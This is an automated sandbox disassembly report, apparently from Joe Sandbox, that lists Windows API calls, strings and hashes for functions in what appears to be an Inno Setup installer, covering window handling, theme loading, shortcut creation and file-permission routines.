                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                              • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$Placement$Iconic
                                                              • String ID:
                                                              • API String ID: 568898626-0
                                                              • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                              • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                              • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                              • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CaptureIconic
                                                              • String ID:
                                                              • API String ID: 2277910766-0
APIs
• IsIconic.USER32(?), ref: 0042419B
  • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
  • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
  • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
  • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
• SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
  • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
Memory Dump Source
• Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: Window$ActiveEnumIconicLongShowWindows
• String ID:
• API String ID: 2671590913-0
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
Memory Dump Source
• Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
Memory Dump Source
• Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
APIs
• ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
Memory Dump Source
• Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: CryptFour
• String ID:
• API String ID: 2153018856-0
APIs
• ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
Memory Dump Source
• Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: CryptFour
• String ID:
• API String ID: 2153018856-0
Memory Dump Source
• Source File: 00000001.00000002.3335312705.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.3335298923.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000001.00000002.3335333324.0000000010002000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10000000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000001.00000002.3335312705.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.3335298923.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000001.00000002.3335333324.0000000010002000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10000000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
• LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
• GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
• GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
• GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
• GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
• GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
• GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
• GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
• GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
• GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
• GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
• GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
• GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
• GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
• GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
• GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
• GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
• GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
• GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
• GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
• GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
• GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
• GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
• GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
• GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
• GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
• GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
• GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
• GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
• GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
• GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
• GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
• GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
• GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
• GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
• GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
• GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
• GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
• GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
• GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
• GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
• GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
• GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
• GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
Strings
Memory Dump Source
• Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: AddressProc$LibraryLoadVersion
• String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
• API String ID: 1968650500-2910565190
APIs
• GetDC.USER32(00000000), ref: 0041CA40
• CreateCompatibleDC.GDI32(?), ref: 0041CA4C
• CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
• CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
• SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
• FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
• SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
• SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
• PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
• CreateCompatibleDC.GDI32(?), ref: 0041CB2B
• SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
• SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
• RealizePalette.GDI32(00000000), ref: 0041CB7D
• SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
• RealizePalette.GDI32(0041CE3C), ref: 0041CB95
• SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
• SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
• BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
• SelectObject.GDI32(00000000,?), ref: 0041CBEE
• DeleteDC.GDI32(00000000), ref: 0041CC04
  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
Memory Dump Source
• Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
• String ID:
• API String ID: 269503290-0
                                                              APIs
                                                              • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                              • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                              • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                              Strings
                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                              • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                              • IPropertyStore::Commit, xrefs: 004568E3
                                                              • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                              • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                              • IPersistFile::Save, xrefs: 00456962
                                                              • CoCreateInstance, xrefs: 004566AF
                                                              • {pf32}\, xrefs: 0045671E
                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance$FreeString
                                                              • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                              • API String ID: 308859552-2363233914
                                                              • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                              • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                              • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                              • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                              APIs
                                                              • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                              • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                              • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                              • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                              • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                              • API String ID: 2000705611-3672972446
                                                              • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                              • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                              • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                              • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                              • API String ID: 1452528299-3112430753
                                                              • Opcode ID: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                              • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                              • Opcode Fuzzy Hash: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                              • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                              APIs
                                                              • GetVersion.KERNEL32 ref: 0045CBDA
                                                              • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                              • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                              • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                              • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                              • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                              • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                              • API String ID: 59345061-4263478283
                                                              • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                              • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                              • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                              • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                              APIs
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                              • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                              • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                              • GetDC.USER32(00000000), ref: 0041B402
                                                              • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                              • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                              • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                              • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                              • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                              • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                              • DeleteDC.GDI32(?), ref: 0041B4D9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                              • String ID:
                                                              • API String ID: 644427674-0
                                                              • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                              • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                              • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                              • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                              APIs
                                                                • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                              • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                              • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                              • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
